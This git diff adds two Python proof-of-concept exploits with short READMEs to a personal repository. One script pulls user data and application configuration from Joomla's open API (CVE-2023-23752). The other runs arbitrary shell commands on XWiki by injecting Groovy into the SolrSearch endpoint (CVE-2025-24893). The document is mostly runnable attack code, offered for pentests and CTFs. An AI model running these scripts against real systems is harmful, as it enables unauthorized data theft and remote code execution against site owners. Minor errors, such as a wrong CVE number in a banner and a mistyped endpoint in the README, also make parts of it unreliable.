diff --git a/CVE-2023-23752/CVE-2023-23752.py b/CVE-2023-23752/CVE-2023-23752.py new file mode 100644 index 0000000..bef468d --- /dev/null +++ b/CVE-2023-23752/CVE-2023-23752.py @@ -0,0 +1,76 @@ +import requests +import json +import argparse + +class User: + def __init__(user, name, email, lastvisitDate, groupNames): + user.name = name + user.email = email + user.lastvisitDate = lastvisitDate + user.groupNames = groupNames + + def __str__(user): + return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}" + +def vulnCheck(tgt): + verUrl = tgt + "/administrator/manifests/files/joomla.xml" + verData = requests.get(verUrl) + if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower(): + print("[-] Site does not appear to be vulnerable!") + raise SystemExit + +def getUsers(tgt): + usrUrl = tgt + "/api/index.php/v1/users?public=true" + usrData = requests.get(usrUrl) + if "404" in usrData.text.lower() or "403" in usrData.text.lower(): + print("[-] Error fetching user data, site may not be vulnerable") + raise SystemExit + parsedUsrs = json.loads(usrData.text) + return parsedUsrs + +def parseUsers(usrData): + users = [] + for user in usrData["data"]: + userAtribs = user["attributes"] + newUser = User(userAtribs["username"], + userAtribs["email"], + userAtribs["lastvisitDate"], + userAtribs["group_names"] ) + users.append(newUser) + return users + +def getConfig(tgt): + cfgUrl = tgt + "/api/index.php/v1/config/application?public=true" + cfgData = requests.get(cfgUrl) + if "404" in cfgData.text.lower() or "403" in cfgData.text.lower(): + print("[-] Error fetching user data, site may not be vulnerable") + raise SystemExit + parsedCfg = json.loads(cfgData.text) + return parsedCfg + + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo') + parser.add_argument('-t', '--target', required=True, help='Target IP/URL') + args = parser.parse_args() + + tgt = args.target.lower() + + if tgt[4] != "http" and tgt[5] != "https": + print("[*] No URL schema specified, defaulting to HTTP") + tgt = "http://" + tgt + + vulnCheck(tgt) + + print(f"\n[+] User data found!") + print("----------") + for user in parseUsers(getUsers(tgt)): + print(user) + print("----------") + + print(f"\n[+] Config data found!") + print("----------") + for i in getConfig(tgt)["data"]: + print(i["attributes"]) + diff --git a/CVE-2023-23752/README.md b/CVE-2023-23752/README.md new file mode 100644 index 0000000..616162e --- /dev/null +++ b/CVE-2023-23752/README.md @@ -0,0 +1,27 @@ +# CVE-2023-23752 - Joomla Information Disclosure + +Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby... + +I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick". + +--- +This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints: + +#### User Info + +`/api/index.php/v1/config/applicaton?public=true` + +#### Config Info + +`/api/index.php/v1/config/application?public=true"` + +## Usage +`python3 CVE-2023-23752.py -t ` + +--- + + +# License +GPL v3.0 - as all good software should be + +Remember - don't be a skid :) diff --git a/CVE-2025-24893/CVE-2025-24893.py b/CVE-2025-24893/CVE-2025-24893.py new file mode 100644 index 0000000..8579dc7 --- /dev/null +++ b/CVE-2025-24893/CVE-2025-24893.py @@ -0,0 +1,59 @@ +import requests +import argparse +import urllib.parse + +# Pretty colors :) +RED = "\033[31m" +GREEN = "\033[32m" +YELLOW = "\033[33m" +BOLD = "\033[1m" +RESET = "\033[0m" + +def testVuln(target): + try: + resp = requests.get(target) + except requests.exceptions.RequestException as error: + print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!") + raise SystemExit(error) + + if "xwiki" not in resp.text.lower(): + print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki") + return False + else: + return True + +def exploit(target, cmd): + payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}') + exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}' + try: + print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!") + resp = requests.get(exploitUrl) + except requests.exceptions.RequestException as error: + print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!") + raise SystemExit(error) + print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!") + + +if __name__ == "__main__": + + + parser = argparse.ArgumentParser(prog='CVE-2025-24893.py', + description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki', + epilog='PoC by 0xVoodoo - Don\'t be a skid :)' ) + parser.add_argument('-t', '--target', required=True, help='Target IP/URL') + parser.add_argument('-c', '--command', required=True, help='Command to execute') + args = parser.parse_args() + + print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo") + + tgt = args.target.lower() + if tgt[4] != "http" and tgt[5] != "https": + print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP") + tgt = 'http://' + tgt + + if testVuln(tgt): + exploit(tgt, args.command) + else: + raise SystemExit() + + diff --git a/CVE-2025-24893/README.md b/CVE-2025-24893/README.md new file mode 100644 index 0000000..f0b4586 --- /dev/null +++ b/CVE-2025-24893/README.md @@ -0,0 +1,11 @@ +# CVE-2025-24893 - XWiki RCE + +This vuln stems from improper user input sanitization when passing SolrSearch queries. Arbitrary groovy code can be executed due to a direct evaluate() call. + +The vulnerable endpoint here is: +`/xwiki/bin/get/Main/SolrSearch?media=rss&text=` + +# License +GPL v3.0 - as all good software should be + +Remember - don't be a skid :) diff --git a/README.md b/README.md index 616162e..d1eff05 100644 --- a/README.md +++ b/README.md @@ -1,27 +1,11 @@ -# CVE-2023-23752 - Joomla Information Disclosure +# PoCs -Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby... +This repo contains proof of concept exploits for vulnerabilities I've come across in pentests and CTFs. This goes without saying but I am not liable for any misuse of these scripts, please be responsible. -I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick". - ---- -This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints: - -#### User Info - -`/api/index.php/v1/config/applicaton?public=true` - -#### Config Info - -`/api/index.php/v1/config/application?public=true"` - -## Usage -`python3 CVE-2023-23752.py -t ` - ---- +# Exploits +- [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/CVE-2023-23752) - Information disclosure in Joomla CMS. +- [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/CVE-2025-24893) - RCE in XWiki. # License -GPL v3.0 - as all good software should be - -Remember - don't be a skid :) +GPLv3 as all good software (or exploits I guess) should be.